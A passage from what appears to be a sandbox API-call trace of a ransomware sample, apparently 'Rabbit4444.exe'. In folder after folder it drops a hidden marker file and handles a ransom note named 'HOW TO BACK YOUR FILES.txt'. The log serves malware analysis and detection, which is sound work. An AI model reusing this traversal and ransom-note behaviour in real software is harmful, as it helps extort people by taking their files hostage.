ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xed9f55bd, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0060.907] FindClose (in: hFindFile=0x102a10 | out: hFindFile=0x102a10) returned 1 [0060.907] lstrcpyW (in: lpString1=0x130ebea, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0060.907] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\RoamingState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.contactsupport_cw5n1h2txyewy\\roamingstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0060.907] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0060.907] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0060.908] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0060.908] CloseHandle (hObject=0x2a0) returned 1 [0060.908] CloseHandle (hObject=0x27c) returned 1 [0060.908] GetCurrentThreadId () returned 0xd98 [0060.908] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122128 [0060.908] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\LocalState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\LocalState" [0060.908] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124758 | out: hHeap=0xe0000) returned 1 [0060.908] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122120 | out: hHeap=0xe0000) returned 1 [0060.908] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\LocalState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\LocalState" [0060.908] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\LocalState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\LocalState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\LocalState\\" [0060.908] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\LocalState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3" [0060.909] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.contactsupport_cw5n1h2txyewy\\localstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0060.909] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0060.912] FlushFileBuffers (hFile=0x27c) returned 1 [0060.913] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0060.913] CloseHandle (hObject=0x27c) returned 1 [0060.913] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\LocalState") returned 86 [0060.913] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0060.913] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\LocalState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x99201695, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd27c0cd9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeda1b860, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102910 [0060.913] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.913] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.913] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0060.914] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0060.914] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x99201695, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd27c0cd9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeda1b860, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.914] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.914] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.914] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0060.914] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0060.914] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0060.914] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeda1b860, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeda1b860, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeda1b860, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0060.914] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.914] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0060.914] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeda1b860, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeda1b860, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeda1b860, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0060.914] FindClose (in: hFindFile=0x102910 | out: hFindFile=0x102910) returned 1 [0060.914] lstrcpyW (in: lpString1=0x130ebe6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0060.914] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\LocalState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.contactsupport_cw5n1h2txyewy\\localstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0060.914] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0060.915] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0060.915] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0060.915] CloseHandle (hObject=0x2a0) returned 1 [0060.915] CloseHandle (hObject=0x27c) returned 1 [0060.915] GetCurrentThreadId () returned 0xd98 [0060.915] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1220a8 [0060.915] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\LocalCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\LocalCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\LocalCache" [0060.915] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123a68 | out: hHeap=0xe0000) returned 1 [0060.915] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1220a0 | out: hHeap=0xe0000) returned 1 [0060.915] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\LocalCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\LocalCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\LocalCache" [0060.915] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\LocalCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\LocalCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\LocalCache\\" [0060.915] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\LocalCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3" [0060.915] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.contactsupport_cw5n1h2txyewy\\localcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0060.917] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0060.919] FlushFileBuffers (hFile=0x27c) returned 1 [0060.920] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0060.920] CloseHandle (hObject=0x27c) returned 1 [0060.921] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\LocalCache") returned 86 [0060.921] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0060.921] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\LocalCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x992278f7, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd27c03e0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeda1b860, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a50 [0060.921] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.921] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.921] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0060.921] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0060.921] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x992278f7, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd27c03e0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeda1b860, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.921] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.921] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.921] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0060.921] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0060.921] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0060.921] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeda1b860, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeda1b860, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeda1b860, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0060.921] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.921] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0060.921] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeda1b860, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeda1b860, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeda1b860, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0060.921] FindClose (in: hFindFile=0x102a50 | out: hFindFile=0x102a50) returned 1 [0060.921] lstrcpyW (in: lpString1=0x130ebe6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0060.921] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\LocalCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.contactsupport_cw5n1h2txyewy\\localcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0060.922] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0060.922] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0060.922] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0060.922] CloseHandle (hObject=0x2a0) returned 1 [0060.922] CloseHandle (hObject=0x27c) returned 1 [0060.922] GetCurrentThreadId () returned 0xd98 [0060.923] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1221c8 [0060.923] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AppData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AppData" [0060.923] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x118de8 | out: hHeap=0xe0000) returned 1 [0060.923] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1221c0 | out: hHeap=0xe0000) returned 1 [0060.923] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AppData" [0060.923] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AppData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AppData\\" [0060.923] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3" [0060.923] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.contactsupport_cw5n1h2txyewy\\appdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0060.924] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0060.928] FlushFileBuffers (hFile=0x27c) returned 1 [0060.929] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0060.929] CloseHandle (hObject=0x27c) returned 1 [0060.930] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AppData") returned 83 [0060.930] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0060.930] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x992278f7, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd27bf9b8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeda1b860, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102910 [0060.930] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.930] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.930] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0060.930] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0060.930] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x992278f7, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd27bf9b8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeda1b860, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.930] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.930] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.930] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0060.930] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0060.930] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0060.931] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeda1b860, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeda1b860, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeda418db, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0060.931] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.931] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0060.931] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeda1b860, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeda1b860, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeda418db, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0060.931] FindClose (in: hFindFile=0x102910 | out: hFindFile=0x102910) returned 1 [0060.931] lstrcpyW (in: lpString1=0x130ebe0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0060.931] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.contactsupport_cw5n1h2txyewy\\appdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0060.932] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0060.932] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0060.933] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0060.933] CloseHandle (hObject=0x2a0) returned 1 [0060.933] CloseHandle (hObject=0x27c) returned 1 [0060.933] GetCurrentThreadId () returned 0xd98 [0060.933] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x121fe8 [0060.933] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC" [0060.933] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121710 | out: hHeap=0xe0000) returned 1 [0060.933] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121fe0 | out: hHeap=0xe0000) returned 1 [0060.933] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC" [0060.933] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC", lpString2="\\" | out: 